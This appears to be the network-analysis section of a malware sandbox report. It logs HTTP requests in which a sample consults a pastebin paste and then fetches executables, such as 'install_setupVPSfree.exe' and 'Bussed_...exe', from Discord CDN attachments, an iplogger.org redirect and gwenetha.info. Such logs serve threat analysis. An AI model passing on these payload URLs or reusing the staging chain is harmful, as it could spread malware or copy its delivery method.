Network Analysis

GET /raw/gCyjHCCH HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 02:25:31 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d728d8d5bd6b75095079f00b5751c26e41617762331; expires=Fri, 07-May-21 02:25:31 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1584 cf-request-id: 094bbf43fe0000a225afb79000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63bfce4cc9cea225-ICN

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 02:25:38 GMT Content-Type: application/x-msdos-program Content-Length: 505856 Connection: keep-alive Set-Cookie: __cfduid=dcb3b29f6ed0ab68e370749573c2b88331617762338; expires=Fri, 07-May-21 02:25:38 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bfce763e39a219-ICN Accept-Ranges: bytes Age: 617347 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe ETag: "28345a7bb63babaf99e760965ce493b7" Expires: Thu, 07 Apr 2022 02:25:38 GMT Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094bbf5dec0000a219823c8000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132901889175 x-goog-hash: crc32c=Ws/4nQ== x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 505856 X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WJX9PoWHwCQomzwrjgG804fLfj2A8%2B66ywO1cPOJwE0rgeZgSemJk21qcfZ9RIl%2BR%2BxrkpdjPQxdEM%2BS%2BMYu9osc8w91MBZ0birmyaOi1t0nENs%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 02:25:39 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=ddc6b00e91b81855c32af3de18ea0baf51617762339; expires=Fri, 07-May-21 02:25:39 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bfce7b4de7a23d-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 02:25:39 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094bbf61120000a23d0f3ef000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UwsCiH_H4NVi20zsMYz81pdeZiT8sKq4o5az1xnLi2jwGSfahiE9JvXJn59A3i9PUM4A3UQUQfi73CMYsHJCMh46hNb4g X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=b5vA9W4v14kwseafkYDEbzgf4ZTGW%2BRcDyHiC3i8eRM7O33q8U0yjUNDTSrzOiGUo6UzX%2By1D3iV5EyOWfFCaVkRsL5FIULfouBBMlA%2F5a1O0Ng%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /2LehR6.exe HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 07 Apr 2021 02:25:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=trd8hdck2j92tgsapl40ngiml7; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261285852; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /setup-KGQJ-1.exe HTTP/1.1 Host: gwenetha.info Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Wed, 07 Apr 2021 02:25:40 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 19 Connection: keep-alive Set-Cookie: __cfduid=dafa5fef7475dde698975793f7b6b693b1617762340; expires=Fri, 07-May-21 02:25:40 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 094bbf649d0000eb8d38105000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Sj3eqx%2BbYDYYrF4qJVejJonBqcLC8tZqYPLZunkbV6s%2FzqncGu3QNi54hOySbnX9Vd4Bq%2FdIet0DMzxq2ESSLR3h9Zx%2FregXX0%2FgyxnF"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63bfce80ffc5eb8d-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 02:25:44 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d40c3189b537190d5b2127033257f6c451617762343; expires=Fri, 07-May-21 02:25:43 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bfce985fa1a219-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 02:25:44 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094bbf73370000a219833e7000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UyH1utUr0bWm9PQ45BVfxv_oOAGtt_rOinjFwQ7ommPE7ooVzycpPS_NcyVfvPh5FuXBRgixHEpZz_j7ppXJrJdyNAZVw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Vz0SOGfX669K%2FrRWbIIjavKgXRZqiaamcL2OXGjH5UPeTAeGiFk8TbmgbLI3Eoui3v4Xq7Ky3CN%2F2R0xhsdpKoncFSP%2Fd6nvtlJxEyXqTEIE8Ag%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 02:25:44 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d89d2ea4fad684d3f41c5d061c40ac6341617762344; expires=Fri, 07-May-21 02:25:44 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bfce9c2b14a219-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 02:25:44 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094bbf75950000a219942d9000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UwMN87H0KibrzfQfGx_0xr-c_3cmTVCfdfj16J7fV5amUm0xJakwI-Y6JorePjnG0FTOofDWaaxA2O3InSRVyvrs-z4Hg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8Risz%2FSBFIHd2z5N9RVXAWs8u1FEmO1WANzWEYI6bSW5OnuaoZOIBWpsGMtGTrdoOqRXbw%2BjPulGT1TNXklNCB9JdK7AHtAGNX6JjDsf9LbWlLk%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 02:25:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dd42c565b02434fc73c67b31c8bfc991f1617762355; expires=Fri, 07-May-21 02:25:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 094bbfa2140000e9d8158b4000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DOhpYIwoykz1gjN7ShVZYEid0NVQY5hGljoDUmqTt6%2BMqKxgoihKhpf0Td9hkRMCJ26rJ9p7Bn49wiy7ukBENj7MC%2Bh2%2B4Tpa0WzLxB8GMuAGV4%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63bfcee34b8ae9d8-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 02:25:59 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d0f3960429a5deecf081f1c589de68bdf1617762359; expires=Fri, 07-May-21 02:25:59 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bfcef80f863532-ICN Age: 15 Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 02:25:44 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094bbfaf0000003532e936c000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UwMN87H0KibrzfQfGx_0xr-c_3cmTVCfdfj16J7fV5amUm0xJakwI-Y6JorePjnG0FTOofDWaaxA2O3InSRVyvrs-z4Hg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lsDbJFy4of8xF4lCRemArN9dGo%2FcBoTzVhQByQwzc5fg4sKPlfrBtbbIpTV2dx9D0SY2eRMzvVtFohI5%2FsekNI3dtBh6OfQBoG4Z2hidDw6nJR8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 02:26:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d2a7d7265b90273328412cd34a4d117e31617762362; expires=Fri, 07-May-21 02:26:02 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 094bbfbd570000e9d81c31b000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cMF1mQyj%2FTHgzxEXIdUlLuaSR%2BQSoxsaNs2ZUlHsTdcXGT72%2FglIgYldcuwa8jqEY82Nwscyc3KQ6Ns%2BDWYOuRwtbqclQ%2B6vfZBWX9eSoh%2Fbbzk%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63bfcf0efcbbe9d8-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400